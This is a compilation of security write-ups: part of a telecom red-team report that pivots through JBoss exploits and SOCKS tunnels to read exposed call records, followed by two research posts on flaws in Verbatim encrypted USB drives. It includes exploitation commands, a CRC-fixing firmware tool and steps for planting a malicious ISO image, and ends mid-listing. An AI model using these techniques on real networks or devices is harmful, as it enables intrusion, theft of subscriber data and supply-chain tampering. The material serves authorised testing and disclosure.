In my case, I initiated the connection from my server, where the source address was 127.0.0.1 using port 2222/tcp (thanks to the TCP tunnel over HTTP), to the NMS server with the destination address 127.0.0.1 (again!). Because of this setup, all the admin would see is a connection initiated by the NMS server to the NMS server’s SSH, using the authorized key (the public key) stored for the user ‘nms’ (that’s why I created the same user on my host to generate the keys). And even if the admin checked the known_hosts file, all he would see is the user ‘nms@[REDACTED]_NMS[REDACTED]’ connected to SSH with the IP 127.0.0.1, which was already a user profile on the NMS server.

To confirm the SOCKS tunnel, I checked the connection table on my server and port 9090/tcp was in the LISTEN state.

Awesome! The SOCKS Tunnel is ready!

All that was left for me was to use the SOCKS tunnel for Metasploit for further network exploitation which I’ll cover in the next post (the final part):

Pro Tip!

When you connect to a server over SSH, a pseudo TTY is automatically allocated. Of course, this doesn’t happen when you’re executing commands via SSH (one-liners). So whenever you want to tunnel through SSH or create a SOCKS tunnel, try the -T switch to disable the pseudo TTY allocation. You can also use the below command:

ssh -NTfCq -L <local port forwarding> <user@host>
ssh -NTfCq -D <Dynamic port forwarding> <user@host>

To check all the SSH switches you can refer to the SSH manual (HIGHLY RECOMMENDED!). When creating a tunnel with the switches (showed above), you can create a tunnel without a TTY allocation and the tunneled port will work just fine!

How I hacked into a Telecom Network — Part 4 (Getting Access to CDRs, SS7 applications & VLRs)


TLDR; Red Team Engagement for a telecom company. Got a foothold on the company’s Network Monitoring System (NMS). Sorted reverse shell issue with tunneling SSH over HTTP. Went full-on Ninja when getting SSH over HTTP. Proxied inside the network for internal network scans. Got access to CDRs and VLR with SS7 application.

Recap: Red Team Engagement for a Telecom company. Found an interesting subdomain, did a full port scan on that subdomain, found ports 12000/tcp, 14000/tcp, and 14100/tcp, found a running instance of JBoss (lucky me!), exploited JBoss for RCE, and implemented a TCP tunnel over HTTP for shell stability.

In the previous part (Playing with Tunnels: Stealthy SSH & Dynamic SSH Tunnels), I described the steps I followed to create SSH tunnels with stealthy SSH access from my server using port 2222/tcp. In this blog post, I’ll show how I used the SOCKS tunnel for internal network reconnaissance and to exploit internal servers to get access to the CDRs stored on a server.

Situational Awareness (Internal Network)

During the engagement, I was able to create a Dynamic SSH tunnel via TCP tunnel over HTTP, and believe me when I say this, the shell was neat!

Moving forward, I configured the SOCKS tunnel on port 9090/tcp and then pointed proxychains at it for Nmap scans.

Though I preferred Metasploit over Nmap, as it gave me more coverage over the scans and I was able to manage the internal IP scans easily with it. To use the proxies for all modules, I used the “setg Proxies socks4:127.0.0.1:9090” command (to set the proxy option globally). I was looking for internal web servers, so I used the auxiliary/scanner/http/http_version module.

Because of setg, the Proxies option was already set; now all I needed to do was provide the IP subnet range and run the module.
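Roughly, the msfconsole sequence looks like this (the subnet is a placeholder, and THREADS is kept low since everything rides through the tunnel):

setg Proxies socks4:127.0.0.1:9090
use auxiliary/scanner/http/http_version
set RHOSTS 10.x.x.0/24
set THREADS 10
run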

I found some Remote Management Controllers (iRMC), some SAN switches (switchExplorer.html), and a JBoss Instance …

There’s another JBoss instance used internally? 🤣

Exploiting Internal Network Service

So there was another JBoss instance running on port 80/tcp on an internal IP 10.x.x.x. All I had to do was use proxychains and run JexBoss once more against the internal IP (I could have also used the -P switch in JexBoss to provide the proxy address).
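With /etc/proxychains.conf pointing at the SOCKS tunnel (a socks4 entry for 127.0.0.1 port 9090), the invocation is roughly:

proxychains ./jexboss.py -u http://10.x.x.x:80/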

This was an easy win for me, as the internal JBoss server was also vulnerable, and due to that, I was able to get RCE from my pivot machine (the initial foothold machine) on the next internal JBoss server 😎

Awesome! Once I got the shell, I used the following command to list all the files and directories under the /home/<user> location in a structured, tree-like way:

cd /home/<user> && find . -print | sed -e "s;[^/]*/;|_ _ _ _;g;s;_ _ _ _|; |;g" 2>&1

In the output, I found an interesting .bat file: ss7-cli.bat (the script configures the SS7 Management Shell Bootstrap Environment).

On the same internal JBoss server, a Visitor Location Register (VLR) console client application was also stored, used to access the VLR information from the database.

What’s SS7?

Signaling System №7 (SS7) is a set of telephony signaling protocols developed in 1975, which is used to set up and tear down telephone calls in most parts of the world-wide public switched telephone network (PSTN). The protocol also performs number translation, local number portability, prepaid billing, Short Message Service (SMS), and other services. Source: Wikipedia

To monitor the SS7/ISDN links and decode the protocol standards and generate CDRs for billing purposes, a console client is required that will interact with the system.

You may ask why there was an SS7 client application running on JBoss? One word: “Mobicents”.

Mobicents

Mobicents is an Open Source VoIP Platform written in Java to help create, deploy, manage services and applications integrating voice, video, and data across a range of IP and legacy communications networks. Source: Wikipedia

Mobicents enables the composition of Service Building Blocks (SBB) such as call control, billing, user provisioning, administration, and presence-sensitive features. This makes Mobicents servers an easy choice for telecom Operations Support Systems (OSS) and Network Management Systems (NMS). Source: design.jboss.org

So it looks like the internal JBoss server was running a VoIP gateway application (SIP server) that interacts with the Public Switched Telephone Network (PSTN) using SS7. (It was tiring to work out the internal network structure without any kind of network architecture diagram.)

Going beyond

While doing some more recon on the internal JBoss application running the VoIP gateway, I found that there were some internal gateway servers, CDR backup databases, FTP servers that stored backup configurations of the SS7 and USSD protocols, etc. (thanks to /etc/hosts).

From the hosts file, I found a lot of FTP servers which at first didn’t really feel important, but then I found the CDR-S and CDR-L FTP servers. These servers were storing the backup CDR S-Records and CDR L-Records respectively.

You can read more about these records here: CDR S-Records (page 157) & CDR L-Records (page 168).

Using Metasploit, I quickly scanned these FTP servers and checked for their authenticated status.
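A sketch of such a check with Metasploit’s anonymous FTP login scanner (the host list is a placeholder; the Proxies option is still set globally from before):

use auxiliary/scanner/ftp/anonymous
set RHOSTS <CDR-S and CDR-L FTP server IPs>
run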

The FTP servers were accessible without any kind of authentication 🤣🤣

Maybe the FTP servers were meant for internal use by VoIP applications or something else, but still, a win is a win!

Due to this, I was able to get to the CDR backups, stored in XLS format, for almost all the mobile subscribers. (Sorry, but I had to redact a lot, as this is really critical information.)

In the screenshot, the A number is where the call originated (the caller) and the B number is the dialed number. The CDR record also includes the IMSI & IMEI numbers, the call start/end date & timestamp, the call duration, the call type (incoming or outgoing), the service type (the telecom service companies), Cell ID-A (the cell tower from which the call originated), and Location-A (the location of the caller).

Once our team notified the client about our access to the CDR backup servers, the client asked us to end the engagement there. I guess it was too much for them to take 🤣

I hope you guys enjoyed it!

Promotion Time!

If you guys want to learn more about the techniques I used and the basic concepts behind it, you can read my books (co-authored with @himanshu_hax)

Hacking Some More Secure USB Flash Drives (Part II)

Original text by Matthias Deeg

In the second article of this series, SySS IT security expert Matthias Deeg presents security vulnerabilities found in another crypto USB flash drive with AES hardware encryption.

Introduction

In the second part of this blog series, the research results concerning the secure USB flash drive Verbatim Executive Fingerprint Secure SSD, shown in the following figures, are presented.

Front view of the secure USB flash drive Verbatim Executive Fingerprint Secure

The Verbatim Executive Fingerprint Secure SSD is a USB drive with AES 256-bit hardware encryption and a built-in fingerprint sensor for unlocking the device with previously registered fingerprints.

The manufacturer describes the product as follows:

The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time. The drive is compliant with GDPR requirements as 100% of the drive is securely encrypted. The built-in fingerprint recognition system allows access for up to eight authorised users and one administrator who can access the device via a password. The SSD does not store passwords in the computer or system’s volatile memory making it far more secure than software encryption.

The used test methodology regarding this research project, the considered attack surface and attack scenarios, and the desired security properties expected in a secure USB flash drive were already described in the first part of this article series.

Hardware Analysis

When analyzing a hardware device like a secure USB flash drive, the first thing to do is to take a closer look at the hardware design. By opening the case of the Verbatim Executive Fingerprint Secure SSD, its printed circuit board (PCB) can be removed. The following figure shows the front side of the PCB and the used SSD with an M.2 form factor.

PCB front side of Verbatim Executive Fingerprint Secure SSD

Here, we can already see the first three main components of this device:

  1. NAND flash memory chips
  2. a memory controller (Maxio MAS0902A-B2C)
  3. a SPI flash memory chip (XT25F01D)

On the back side of the PCB, three further main components can be found:

  1. a USB-to-SATA bridge controller (INIC-3637EN)
  2. a fingerprint sensor controller (INIC-3782N)
  3. a fingerprint sensor

PCB back side of Verbatim Executive Fingerprint Secure SSD

The Maxio memory controller and the NAND flash memory chips are part of an SSD in M.2 form factor. This SSD can be read and written using another SSD enclosure supporting this form factor which was very useful for different security tests.

Encryption

Just like the Verbatim Keypad Secure covered in the first part of this article series, the Verbatim Executive Fingerprint Secure SSD contains a SATA SSD with an M.2 form factor which can be used in another compatible SSD enclosure. Thus, analyzing the actually stored data of this secure USB flash drive was also rather easy.

By taking a closer look at the encrypted data, obvious patterns could be seen, as the following hexdump illustrates:

# hexdump -C /dev/sda
00000000  7c a1 eb 7d 4e 39 1e b1  9b c8 c6 86 7d f3 dd 70  ||..}N9......}..p|
*
000001b0  99 e8 74 12 35 1f 1b 3b  77 12 37 6b 82 36 87 cf  |..t.5..;w.7k.6..|
000001c0  fa bf 99 9e 98 f7 ba 96  ba c6 46 3a e5 bc 15 55  |..........F:...U|
000001d0  7c a1 eb 7d 4e 39 1e b1  9b c8 c6 86 7d f3 dd 70  ||..}N9......}..p|
*
000001f0  92 78 15 87 cd 83 76 30  56 dd 00 1e f2 b3 32 84  |.x....v0V.....2.|
00000200  7c a1 eb 7d 4e 39 1e b1  9b c8 c6 86 7d f3 dd 70  ||..}N9......}..p|
*
00100000  1e c0 fa 24 17 d9 4b 72  89 44 20 3b e4 56 99 32  |...$..Kr.D ;.V.2|
00100010  d8 65 93 7c 37 aa 8f 59  5e ec f1 e7 e6 9b de 9e  |.e.|7..Y^.......|
[...]

The * in this hexdump output means that the previous line (here 16 bytes of data) is repeated one or more times; the address in the first column shows where the next differing line starts. For example, the first 16 bytes 7c a1 eb 7d 4e 39 1e b1 9b c8 c6 86 7d f3 dd 70 fill the first 432 (0x1b0) bytes of the drive, i.e. this pattern is repeated 27 times starting at the address 0x00000000, and the same 16-byte pattern occurs twice more starting at the address 0x000001d0.

Seeing such repeating byte sequences in encrypted data is not a good sign, as we already know from part one of this series.

By writing known byte patterns to an unlocked device, it could be confirmed that the same 16 bytes of plaintext always result in the same 16 bytes of ciphertext. This indicates that a block cipher with 16-byte-long blocks was used in Electronic Codebook (ECB) mode, for example AES-256-ECB.
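A quick way to check a dump for such ECB-like behavior is to count duplicate 16-byte ciphertext blocks; the following minimal Python sketch illustrates the idea (a drive encrypted with a diffusing mode such as AES-XTS should show virtually no repeats):

# Minimal sketch: count repeated 16-byte ciphertext blocks to spot
# ECB-like behavior. Reading a raw device like /dev/sda requires root;
# a dumped image file works just as well.
from collections import Counter

def count_repeated_blocks(path: str, block_size: int = 16, limit: int = 2**20) -> int:
    with open(path, "rb") as f:
        data = f.read(limit)  # only inspect the first mebibyte
    counts = Counter(data[i:i + block_size]
                     for i in range(0, len(data) - block_size + 1, block_size))
    return sum(c for c in counts.values() if c > 1)

print(count_repeated_blocks("/dev/sda"))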

For some data, the lack of the cryptographic property called diffusion, which is inherent to this mode of operation, can leak sensitive information even in encrypted data. A famous example illustrating this issue is a bitmap image of Tux, the Linux penguin, and its ECB-encrypted image data shown in the following Figure.

Image of Tux (left) and its ECB encrypted image data (right) illustrating ECB mode of operation on Wikipedia

This found security issue was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-010 and was assigned the CVE ID CVE-2022-28382.

Firmware Analysis

The SPI flash memory chip (XT25F01D) of the Verbatim Executive Fingerprint Secure SSD contains the firmware for the USB-to-SATA bridge controller Initio INIC-3637EN. The content of this SPI flash memory chip could be extracted using the universal programmer XGecu T56.

When analyzing the firmware, it turned out that the firmware validation only consists of a simple CRC-16 check in XMODEM configuration. Thus, an attacker is able to store malicious firmware code for the INIC-3637EN with a correct checksum on the used SPI flash memory chip.

For updating modified firmware images, a simple Python tool was developed that fixes the required CRC-16, as the following output exemplarily shows.

$ python update-firmware.py firmware_hacked.bin
Verbatim Executive Fingerprint Secure SSD Firmware Updater v0.1 - Matthias Deeg, SySS GmbH (c) 2022
[*] Computed CRC-16 (0x7087) does not match stored CRC-16 (0x48EE).
[*] Successfully updated firmware file
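The tool itself was not published, but a minimal sketch of such a CRC-16/XMODEM fixer could look like the following, assuming the checksum is stored big-endian in the last two bytes of the image (offset and byte order would have to be confirmed against the actual firmware layout):

# Minimal sketch of a CRC-16/XMODEM firmware fixer. Assumption: the
# checksum lives in the last two bytes of the image, stored big-endian.
import sys

def crc16_xmodem(data: bytes) -> int:
    # CRC-16/XMODEM: polynomial 0x1021, initial value 0x0000, no reflection
    crc = 0x0000
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1021) & 0xFFFF if crc & 0x8000 else (crc << 1) & 0xFFFF
    return crc

def fix_firmware(path: str) -> None:
    with open(path, "rb") as f:
        image = f.read()
    body, stored = image[:-2], int.from_bytes(image[-2:], "big")
    computed = crc16_xmodem(body)
    if computed != stored:
        print(f"[*] Computed CRC-16 (0x{computed:04X}) does not match stored CRC-16 (0x{stored:04X}).")
        with open(path, "wb") as f:
            f.write(body + computed.to_bytes(2, "big"))
        print("[*] Successfully updated firmware file")

if __name__ == "__main__":
    fix_firmware(sys.argv[1])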

Thus, an attacker is able to store malicious firmware code for the INIC-3637EN with a correct checksum on the used SPI flash memory chip (XT25F01D), which then gets successfully executed by the USB-to-SATA bridge controller. For instance, this security vulnerability could be exploited in a so-called supply chain attack when the device is still on its way to its legitimate user.

An attacker with temporary physical access during the supply chain could program modified firmware onto the Verbatim Executive Fingerprint Secure SSD which, for example, always uses an attacker-controlled AES key for the data encryption. If the attacker later on gains access to the used USB drive, they can simply decrypt all contained user data.

This found security issue concerning the insufficient firmware validation, which allows an attacker to store malicious firmware code for the USB-to-SATA bridge controller on the USB drive, was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-011 and was assigned the CVE ID CVE-2022-28383.

Protocol Analysis

The hardware design of the Verbatim Executive Fingerprint Secure SSD allowed for sniffing the serial communication between the fingerprint sensor controller (INIC-3782N) and the USB-to-SATA bridge controller (INIC-3637EN).

The following Figure exemplarily shows exchanged data when unlocking the device with a correct fingerprint. The actual communication is bidirectional and different data packets are exchanged during an unlocking process.

Sniffed serial communication when unlocking with a correct fingerprint shown in logic analyzer

In the course of this research project, no further time was spent to analyze the used proprietary protocol between the fingerprint sensor controller and the USB-to-SATA bridge controller, as a simpler way could be found to attack this device, which is described in the next section.

User Authentication

The Verbatim Executive Fingerprint Secure SSD supports the following two user authentication methods:

  1. Biometric authentication via fingerprint
  2. Password-based authentication

For the biometric authentication, a fingerprint sensor and a specific microcontroller (INIC-3782N) are used. Unfortunately, no public information about the INIC-3782N could be found, like data sheets or programming manuals.

For the registration of fingerprints, a client software (available for Windows or macOS) is used. The client software also supports a password-based authentication for accessing the administrative features and unlocking the secure disk partition containing the user data. The following Figure shows the login dialog of the provided client software for Windows.

Password-based authentication for administrator (VerbatimSecure.exe)

Software Analysis

The client software for Windows and macOS is provided on an emulated CD-ROM drive of the Verbatim Executive Fingerprint Secure SSD, as the following Figure exemplarily illustrates.

Emulated CD-ROM drive with client software

During this research project, only the Windows software in form of the executable VerbatimSecure.exe was analyzed. This Windows client software communicates with the USB storage device via IOCTL_SCSI_PASS_THROUGH (0x4D004) commands using the Windows API function DeviceIoControl. However, simply analyzing the USB communication by setting a breakpoint on this API function in a software debugger like x64dbg was not possible, because the USB communication is AES-encrypted, as the following Figure illustrates.

Encrypted USB communication via DeviceIoControl

Fortunately, the Windows client software is very analysis-friendly, as meaningful symbol names are present in the executable, for example concerning the used AES encryption for protecting the USB communication.

The following Figure shows the AES (Rijndael) functions found in the Windows executable VerbatimSecure.exe.

AES functions of the Windows client software

Here, especially the two functions named CRijndael::Encrypt and CRijndael::Decrypt were of particular interest.

Furthermore, runtime analyses of the Windows client software using a software debugger like x64dbg could be performed without any issues. And in doing so, it was possible to analyze the AES-encrypted USB communication in cleartext, as the following Figure with a decrypted response from the USB flash drive illustrates.

Decrypted USB communication (response from device)

For securing the USB communication, AES with a hard-coded cryptographic key is used.
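Once this hard-coded key has been extracted from the binary, captured IOCTL payloads can also be decrypted offline. A hypothetical sketch follows; the key value, AES mode, and payload framing are placeholders, not the real parameters:

# Hypothetical sketch: offline decryption of a captured USB payload with a
# key extracted from VerbatimSecure.exe. Key value, AES mode and payload
# framing are placeholders here.
from Crypto.Cipher import AES  # pip install pycryptodome

HARDCODED_KEY = bytes(32)  # placeholder for the extracted key

def decrypt_usb_payload(ciphertext: bytes) -> bytes:
    # ciphertext length must be a multiple of the 16-byte block size
    return AES.new(HARDCODED_KEY, AES.MODE_ECB).decrypt(ciphertext)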

When analyzing the USB communication between the client software and the USB storage device, a very interesting and concerning observation was made. That is, before the login dialog with the password-based authentication is shown, there was already some USB device communication with sensitive data. And this sensitive data was nothing less than the currently set password for the administrative access.

The following Figure shows the corresponding decrypted USB device response with the current administrator password S3cretP4ssw0rd in this example.

Decrypted USB device response containing the current administrator password

Thus, by accessing the decrypted USB communication of this specific IOCTL command, for instance using a software debugger as illustrated in the previous Figure, an attacker can instantly retrieve the correct plaintext password and thus unlock the device in order to gain unauthorized access to its stored user data.

In order to simplify the password retrieval process, a software tool named Verbatim Fingerprint Secure Password Retriever was developed that can extract the currently set password of a Verbatim Executive Fingerprint Secure SSD. The following Figure exemplarily shows the successful retrieval of the password S3cretP4ssw0rd that was previously set on this test device.

Successful attack using the developed Verbatim Fingerprint Secure Password Retriever

This found security vulnerability was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-009 with the assigned CVE ID CVE-2022-28387.

You can also find a demonstration of this attack in our SySS PoC video Hacking Yet Another Secure USB Flash Drive.

Data Authenticity

As described previously, the client software for administrative purposes is provided on an emulated CD-ROM drive. As my analysis showed, the content of this emulated CD-ROM drive is stored as an ISO-9660 image in hidden sectors of the USB drive, which can only be accessed using special IOCTL commands or by installing the drive in an external enclosure.

The following fdisk output shows the disk information when using the Verbatim enclosure, with a total of 1000179711 sectors.

# fdisk -l /dev/sda
Disk /dev/sda: 476.92 GiB, 512092012032 bytes, 1000179711 sectors
Disk model: Portable Drive
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xbfc4b04e

Device     Boot Start        End    Sectors   Size Id Type
/dev/sda1        2048 1000171517 1000169470 476.9G  c W95 FAT32 (LBA)

The next fdisk output shows the information for the same disk when using an external enclosure, where a total of 1000215216 sectors is available.

# fdisk -l /dev/sda
Disk /dev/sda: 476.94 GiB, 512110190592 bytes, 1000215216 sectors
Disk model: RTL9210B NVME
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

And in those 35505 hidden sectors concerning the tested 512 GB version of the Verbatim Executive Fingerprint Secure SSD, the ISO-9660 image with the content of the emulated CD-ROM drive is stored, as the following output illustrates.

# dd if=/dev/sda bs=512 skip=1000179711 of=cdrom.iso
35505+0 records in
35505+0 records out
18178560 bytes (18 MB, 17 MiB) copied, 0.269529 s, 67.4 MB/s

# file cdrom.iso
cdrom.iso: ISO 9660 CD-ROM filesystem data 'VERBATIMSECURE'

By manipulating this ISO-9660 image or replacing it with another one, an attacker is able to store malicious software on the emulated CD-ROM drive. This malicious software may get executed by an unsuspecting victim when using the device at a later point in time.

The following Figure exemplarily shows what an emulated CD-ROM drive manipulated by an attacker to contain malware may look like.

Emulated CD-ROM drive with attacker-controlled content

The following output exemplarily shows how a hacked ISO-9660 image was generated for testing this attack vector.

# mkisofs -o hacked.iso -J -R -V "VerbatimSecure" ./content

# dd if=hacked.iso of=/dev/sda bs=512 seek=1000179711
25980+0 records in
25980+0 records out
13301760 bytes (13 MB, 13 MiB) copied, 1.3561 s, 9.8 MB/s

As a thought experiment, this security issue concerning the data authenticity of the ISO-9660 image for the emulated CD-ROM partition could be exploited in an attack scenario one could call The Poor Hacker’s Not Targeted Supply Chain Attack which consists of the following steps:

  1. Buy vulnerable devices in online shops
  2. Modify bought devices by adding malware
  3. Return modified devices to vendors
  4. Hope that returned devices are resold and not destroyed
  5. Wait for potential victims to buy and use the modified devices
  6. Profit?!

This found security issue was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-013 with the assigned CVE ID CVE-2022-28385.

Summary

In this article, the research results leading to four different security vulnerabilities concerning the Verbatim Executive Fingerprint Secure SSD listed in the following Table were presented.

Product | Vulnerability Type | SySS ID | CVE ID
Verbatim Executive Fingerprint Secure SSD | Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) | SYSS-2022-009 | CVE-2022-28387
Verbatim Executive Fingerprint Secure SSD | Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) | SYSS-2022-010 | CVE-2022-28382
Verbatim Executive Fingerprint Secure SSD | Missing Immutable Root of Trust in Hardware (CWE-1326) | SYSS-2022-011 | CVE-2022-28383
Verbatim Executive Fingerprint Secure SSD | Insufficient Verification of Data Authenticity (CWE-345) | SYSS-2022-013 | CVE-2022-28385

Again, these results show that new portable storage devices with old security issues are still produced and sold today.

Hacking Some More Secure USB Flash Drives (Part I)

Hacking Some More Secure USB Flash Drives (Part I)

Original text by Matthias Deeg

During a research project in the beginning of 2022, SySS IT security expert Matthias Deeg found several security vulnerabilities in different tested USB flash drives with AES hardware encryption.

Introduction

Encrypting sensitive data at rest has always been a good idea, especially when storing it on small, portable devices like external hard drives or USB flash drives. Because in case of loss or theft of such a storage device, you want to be quite sure that unauthorized access to your confidential data is not possible. Unfortunately, even in 2022, “secure” portable storage devices with 256-bit AES hardware encryption and sometimes also biometric technology are sold that are actually not secure when taking a closer look.

In a series of blog articles (this one being the first one), I want to illustrate how a customer request led to further research resulting in several cryptographically broken “secure” portable storage devices. This research continues the long story of insecure portable storage devices with hardware AES encryption that goes back many years.

This first part is about my research results concerning the secure USB flash drive Verbatim Keypad Secure shown in the following Figure.

Front view of the secure USB flash drive Verbatim Keypad Secure

The Verbatim Keypad Secure is a USB drive with AES 256-bit hardware encryption and a built-in keypad for passcode entry.

The manufacturer describes the product as follows:

The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time with a built-in keypad for passcode input. The USB Drive does not store passwords in the computer or system’s volatile memory making it far more secure than software encryption. Also, if it falls into the wrong hands, the device will lock and require re-formatting after 20 failed passcode attempts.” [1]

Test Methodology

For this research project concerning different secure USB flash drives, the following proven test methodology for IT products was used:

  1. Hardware analysis: Open hardware, identify chips, read manuals, find test points, use logic analyzers and/or JTAG debuggers
  2. Firmware analysis: Try to get access to device firmware (memory dump, download, etc.), analyze firmware for security issues
  3. Software analysis: Static code analysis and runtime analysis of device client software

Depending on the actual product, not all kinds of analysis can be applied. For instance, if there is no software component, it cannot be analyzed, which is the case for the Verbatim Keypad Secure.

Attack Surface and Attack Scenarios

Attacks against the tested secure portable USB storage devices during this research project require physical access to the hardware. In general, attacks are possible at different points in time concerning the storage device life-cycle:

  1. Before the legitimate user has used the device (supply chain attack)
  2. After the legitimate user has used the device
    • Lost device or stolen device
    • Temporary physical access to the device without the legitimate user knowing

Desired Security Properties of Secure USB Flash Drives

When performing security tests, one should have a specification or at least some expectations to test against, in order to distinguish whether achieved test results pose an actual security risk or not.

Regarding the product type of secure USB flash drives, the following list describes desired security properties I would expect:

  • All user data is securely encrypted (impossible to infer information about the plaintext by looking at the ciphertext)
  • Only authorized users have access to the stored data
  • The user authentication process cannot be bypassed
  • User authentication attempts are limited (online brute-force attacks)
    • Reset device after X failed consecutive authentication attempts
  • Device integrity is protected by secure cryptographic means
  • Exhaustive offline brute-force attacks are too expensive™
    • Very large search space (e.g. 2^256 possible cryptographic keys)
    • Required data not easily accessible to the attacker (cannot be extracted without some fancy, expensive equipment and corresponding know-how)

Hardware Analysis

When analyzing a hardware device like a secure USB flash drive, the first thing to do is taking a closer look at the hardware design. By opening the case of the Verbatim Keypad Secure, access to its printed circuit board (PCB) is given as shown in the following Figure.

PCB front side of Verbatim Keypad Secure

Here, we can already see the first three main components of this device:

  1. NAND flash memory chips (TS1256G181)
  2. a memory controller (MARVELL-88NV1120)
  3. a USB-to-SATA bridge controller (INIC-3637EN)

When we remove the main PCB from the case and have a look at its back side, we can find two more main components:

  1. a SPI flash memory chip (XT25F01D)
  2. a keypad controller (unknown chip, marked SW611 2121)

And of course, we have several push buttons making up our keypad.

PCB back side of Verbatim Keypad Secure

The Marvell memory controller and the NAND flash memory chips are part of an SSD in M.2 form factor shown in the following Figure.

SSD with M.2 form factor (front and back side)

This SSD can be read and written using another SSD enclosure supporting this form factor which was very useful for different security tests described in later sections.

Device Lock & Reset

Before having a closer look at the different identified main components of this secure USB flash drive, some simple tests concerning advertised security features were performed, for instance regarding the device lock and reset feature described in the user manual shown in the following Figure.

Warning from Verbatim Keypad Secure User Manual concerning device lock

The idea behind this security feature is to limit the number of passcode guesses to a maximum of 20 when performing a brute-force attack. When this threshold of 20 failed unlock attempts is reached, the USB drive should have to be newly initialized, and all previously stored data should no longer be accessible. However, when performing manual passcode brute-force attacks during the research project, it was not possible to lock the available test devices after 20 consecutively failed unlock attempts; locking the device so that reformatting is required could not be triggered at all. Thus, this security feature simply does not work as specified, and an attacker with physical access to a Verbatim Keypad Secure USB flash drive can try far more passcodes than the 20 proclaimed by Verbatim.

This found security issue was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-004 and was assigned the CVE ID CVE-2022-28386.

Encryption

As the Verbatim Keypad Secure contains a SATA SSD with an M.2 form factor which can be used in another compatible SSD enclosure, analyzing the actually stored data of this secure USB flash drive was rather easy.

And by having a closer look at the encrypted data, obvious patterns could be seen, as the following hexdump illustrates:

# hexdump -C /dev/sda
00000000  c4 1d 46 58 05 68 1d 9a  32 2d 29 04 f4 20 e8 4d  |..FX.h..2-).. .M|
*
000001b0  9f 73 b0 a1 81 34 ef bd  a4 b3 15 2c 86 17 cb 69  |.s...4.....,...i|
000001c0  eb d0 9d 9a 4e d8 04 a6  92 ba 3f f4 0c 88 a5 1d  |....N.....?.....|
000001d0  c4 1d 46 58 05 68 1d 9a  32 2d 29 04 f4 20 e8 4d  |..FX.h..2-).. .M|
*
000001f0  e0 01 66 72 af f2 be 65  5f 69 12 88 b8 a1 0b 9d  |..fr...e_i......|
00000200  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00100000  73 b2 f8 fb af cf ed 57  47 db b8 c7 ad 9c 91 07  |s......WG.......|
00100010  7a 93 c9 d9 60 7e 2c e4  97 6c 7b f8 ee 4f 87 2c  |z...`~,..l{..O.,|
00100020  19 72 83 d1 6d 0b ca bb  68 f8 ec e3 fc c0 12 b7  |.r..m...h.......|
[...]

The * in this hexdump output means that the previous line (here 16 bytes of data) is repeated one or more times; the address in the first column shows where the next differing line starts. For example, the first 16 bytes c4 1d 46 58 05 68 1d 9a 32 2d 29 04 f4 20 e8 4d fill the first 432 (0x1b0) bytes of the drive, i.e. this pattern is repeated 27 times starting at the address 0x00000000, and the same 16-byte pattern occurs twice more starting at the address 0x000001d0.

Seeing such repeating byte sequences in encrypted data is not a good sign.

By writing known byte patterns to an unlocked device, it could be confirmed that the same 16 bytes of plaintext always result in the same 16 bytes of ciphertext. This indicates that a block cipher with 16-byte-long blocks was used in Electronic Codebook (ECB) mode, for example AES-256-ECB.

For some data, the lack of the cryptographic property called diffusion, which is inherent to this mode of operation, can leak sensitive information even in encrypted data. A famous example illustrating this issue is a bitmap image of Tux, the Linux penguin, and its ECB-encrypted image data shown in the following Figure.

Image of Tux (left) and its ECB encrypted image data (right) illustrating ECB mode of operation on Wikipedia

This found security issue was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-002 and was assigned the CVE ID CVE-2022-28382.

Firmware Analysis

The next step after analyzing the hardware and performing some simple tests concerning the passcode-based authentication was analyzing the device firmware.

Fortunately, the chosen hardware design with an Initio INIC-3637EN USB-to-SATA bridge controller and a separate SPI flash memory chip (XT25F01D) containing this controller’s firmware made the acquisition of the used firmware quite easy, as the content of the SPI flash memory chip could simply be dumped using a universal programmer like an XGecu T56.

Unfortunately, for the used INIC-3637EN there was no datasheet publicly available. But there are research publications with useful information about other, similar chips by Initio, like the INIC-3607. Especially the publication Lost your “secure” HDD PIN? We can Help! by Julien Lenoir and Raphaël Rigo was of great help. And as the INIC-3637EN uses the ARCompact instruction set, the publication Analyzing ARCompact Firmware with Ghidra by Nicolas Iooss and his implemented Ghidra support were also of great use for analyzing the firmware of the Verbatim Keypad Secure.

The following Figure exemplarily illustrates a disassembled and decompiled function of the dumped Verbatim Keypad Secure firmware within Ghidra.

Example of analyzing the Verbatim Keypad Secure firmware with Ghidra

When analyzing the firmware, it turned out that the firmware validation only consists of a simple CRC-16 check in XMODEM configuration. Thus, an attacker is able to store malicious firmware code for the INIC-3637EN with a correct checksum on the used SPI flash memory chip. The following Figure shows the CRC-16 at the end of the firmware dump.

Content of the SPI flash memory chip with a CRC-16 at the end shown in 010 Editor

For updating modified firmware images, a simple Python tool was developed that fixes the required CRC-16, as the following output exemplarily shows.

$ python update-firmware.py firmware_hacked.bin
Verbatim Secure Keypad Firmware Updater v0.1 - Matthias Deeg, SySS GmbH (c) 2022
[*] Computed CRC-16 (0x03F5) does not match stored CRC-16 (0x8B17).
[*] Successfully updated firmware file

Being able to modify the device firmware was very useful for further analyses of the INIC-3637EN, and the configuration and operation mode of its hardware AES engine. By writing some ARCompact assembler code and using the firmware’s SPI functionality, interesting data memory of the INIC-3637EN could be read or modified during the runtime of the Verbatim Keypad Secure.

This found security issue concerning the insufficient firmware validation, which allows an attacker to store malicious firmware code for the USB-to-SATA bridge controller on the USB drive, was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-003 and was assigned the CVE ID CVE-2022-28383.

The following ARCompact assembler code demonstrates how the content of identified AES key buffers (for instance at the memory address 0x40056904, as used in the listing) could be extracted via SPI communication.

.global __start

.text

__start:
